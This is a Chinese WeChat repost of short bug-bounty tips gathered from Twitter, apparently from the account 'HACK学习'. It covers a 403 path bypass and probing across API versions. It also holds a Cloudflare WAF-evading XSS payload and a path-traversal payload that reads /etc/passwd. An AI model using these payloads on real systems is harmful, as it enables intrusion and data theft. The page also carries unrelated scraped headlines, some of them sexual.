人民日报林治波社长发出灵魂拷问:你们是没有常识,还是没有良知?

惨烈的高峰防御战—“圣元春战役”打响!

母子乱伦:和儿子做了,我该怎么办?

一定在信仰的指导下抗击疫情《马克思主义信仰:战胜新冠肺炎疫情的内生力量》

2021年推特网黄Top10排行榜

生成图片,分享到微信朋友圈
自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

干货 | Twitter渗透技巧搬运工(四)

HACK学习 HACK学习呀 2022-11-02
收录于合集
#twitter 5 个
#github 24 个
#漏洞挖掘 59 个

403 Bypass

Bug type: 403 Bypass

site[.]com/env => 403 Forbidden site[.]com/env/HTTPS2 => Bypassed

Bug Bounty Dorks

API hacking

API hacking Status: [Dup] Internally known

Tip: Check endpoint's on different api versions

1. GET /v2/users or /v2/users.json -> 4032. GET /v3/users -> 4033. GET /v3/users.json -> 2004. GET /v4/users -> 2005. POST /v4/users -> 200 [Users created]

bugbounty poc集合

https://github.com/zeroc00I/AllVideoPocsFromHackerOne/tree/main/weakness

命令注入备忘录

Cloudfalre XSS Bypass

"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//

来源:https://github.com/HernanRodriguez1

补充阅读:XSS 绕过 CLOUDFLARE + 过滤器

https://0xjin.medium.com/new-xss-bypass-cloudflare-filters-2a878c01d312

本地文件包含 WAF (Cloudflare) bypass

../../etc/passwd = 403 Forbidden../../etc/random/../passwd = 200 OK


推荐阅读:


干货 | Twitter渗透技巧搬运工(一)


干货 | Twitter渗透技巧搬运工(二)


干货 | Twitter渗透技巧搬运工(三)


干货 | Github安全搬运工 2022年第十五期


干货 | Github安全搬运工 2022年第十六期


实战 | WAF-Bypass之SQL注入绕过思路总结


点赞,转发,在看


由HACK学习编辑整理,如需转载请注明来源HACK学习

干货 | 赏金猎人的fuzz工具和字典总结
干货 | Github安全搬运工 2022年第二十期
干货 | Github安全搬运工 2022年第十九期
干货 | Github安全搬运工 2022年第二十一期
干货 | Github安全搬运工 2022年第十八期

文章有问题?点此查看未经处理的缓存